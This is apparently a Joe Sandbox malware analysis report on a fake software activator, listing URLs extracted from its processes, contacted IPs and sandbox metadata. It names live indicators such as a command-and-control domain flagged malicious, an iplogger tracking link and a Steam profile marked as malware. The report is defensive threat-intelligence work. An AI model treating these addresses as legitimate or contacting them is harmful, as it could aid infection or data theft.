                                                                            https://cdn.discordapp.com/banners/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://github.com/golang/protobuf/issues/1609):n3.exefalse
                                                                                		unknown
                                                                                https://iplogger.com/1KhnJ4rrActivator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://cdn.discordapp.com/guilds/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://discord.com/api/v9/oauth2/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://discord.com/api/v9/gateway/botn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://llvm.org/svn/llvm-project/cfe/tags/RELEASE_370/final/lib/Basic/Version.cppdxcompiler.dllfalse
                                                                                          		unknown
                                                                                          https://discord.com/api/v9/guilds/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://iplogger.com/1KhnJ4.Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshalln3.exefalse
                                                                                                		unknown
                                                                                                https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcln3.exefalse
                                                                                                  		unknown
                                                                                                  https://iplogger.com/1KhnJ4(Activator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.topografix.com/GPX/1/1n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&amp;l=eBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://iplogger.com/1KhnJ4&Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.opengis.net/gml/3.2n3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://discord.com/api/v9/users/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://cdn.discordapp.com/attachments/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.ascendercorp.com/typedesigners.htmln3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drfalse
                                                                                                                  		unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLn3.exe.0.drfalse
                                                                                                                      		unknown
                                                                                                                      https://discord.com/api/v9/stage-instancesn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://advocachark.store/api9BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://discord.com/api/v9//voice/regionsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://status.discord.com/api/v2/scheduled-maintenances/upcoming.jsonn3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.ascendercorp.com/n3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drfalse
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://advocachark.store:443/apippBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://khr.io/hlsl2spirv#optimization)dxcompiler.dllfalse
                                                                                                                                      		unknown
                                                                                                                                      https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://discord.com/api/v9/applicationsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://steamcommunity.com/profiles/765BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • URL Reputation: malware
                                                                                                                                          		unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://advocachark.store/RBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://cdn.discordapp.com/role-icons/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://discord.com/api/v9/n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.nn3.exefalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://winscp.net/DDragExt64.dllfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2n3.exe, 00000002.00000002.2284662032.0000000002502000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.opengis.net/gml/3.3/exrn3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/usen3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://discord.com/api/v9//sticker-packsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://discord.com/api/v9/oauth2/applicationsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://html4/loose.dtdDWrite.dllfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://discord.com/api/v9/gatewayn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://manage.windowsazure.com/https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttpn3.exefalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://.cssDWrite.dllfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown

                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public IPs

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    104.21.42.210
                                                                                                                                                                                    		advocachark.storeUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                    104.18.94.41
                                                                                                                                                                                    		challenges.cloudflare.comUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    104.18.95.41
                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                    		unknownReserved
                                                                                                                                                                                    		unknownunknownfalse
                                                                                                                                                                                    104.102.49.254
                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                    		16625AKAMAI-ASUSfalse
                                                                                                                                                                                    142.250.186.164
                                                                                                                                                                                    		www.google.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                    		a.nel.cloudflare.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    172.67.188.178
                                                                                                                                                                                    		iplogger.comUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    104.21.76.57
                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                    Private

                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.6

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1525047
                                                                                                                                                                                    Start date and time:2024-10-03 16:08:10 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 7m 27s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:11
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:Activator by URKE v2.5.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.evad.winEXE@22/30@27/10
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                                                                    • Number of executed functions: 67
                                                                                                                                                                                    • Number of non-executed functions: 132
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                    Warnings

                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.186.67, 74.125.133.84, 142.250.186.110, 34.104.35.123, 142.250.74.195, 142.250.186.174
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • Execution Graph export aborted for target n3.exe, PID 340 because there are no executed function
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: Activator by URKE v2.5.exe

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    10:09:16API Interceptor2x Sleep call for process: BitLockerToGo.exe modified
                                                                                                                                                                                    10:09:18API Interceptor1x Sleep call for process: Activator by URKE v2.5.exe modified

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    239.255.255.250Notaire-document.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                        voicemaiVOIP_1002202474911222280000000082autoresponse.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          https://www.googleadservices.com/pagead/aclk?sa=L&ai=DChcSEwi8rNLSm_KIAxUlOa0GHbVBExQYABAAGgJwdg&co=1&ase=2&gclid=EAIaIQobChMIvKzS0pvyiAMVJTmtBh21QRMUEAAYASAAEgKymPD_BwE&ohost=www.google.com&cid=CAASJeRouvf6dR1Z030N43abeEvv2GJMSDfBYxMUuk6RVpzEUYpfVo4&sig=AOD64_3veiJdf46Mg_RU5mvf5TWesnE29A&q&nis=6&adurl&ved=2ahUKEwierczSm_KIAxWhD0QIHRYFNnUQ0Qx6BAgIEAEGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                            Capelleaandenijssel.nl_reff_9918205228_HelNc2Zf7n.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                https://mikhailovsky.ru/bitrix/redirect.php?rl=sly&goto=https://mertmodel.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9UjNaeFZqUT0mdWlkPVVTRVIxMDA5MjAyNFUwMTA5MTAyNg==N0123Nherbertn@airborn.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                    https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                        104.18.94.41https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            http://arcor.cfd#warszawa@psgaz.plGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                              https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMOGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                http://investmentmemo.xyzGet hashmaliciousHtmlDropperBrowse
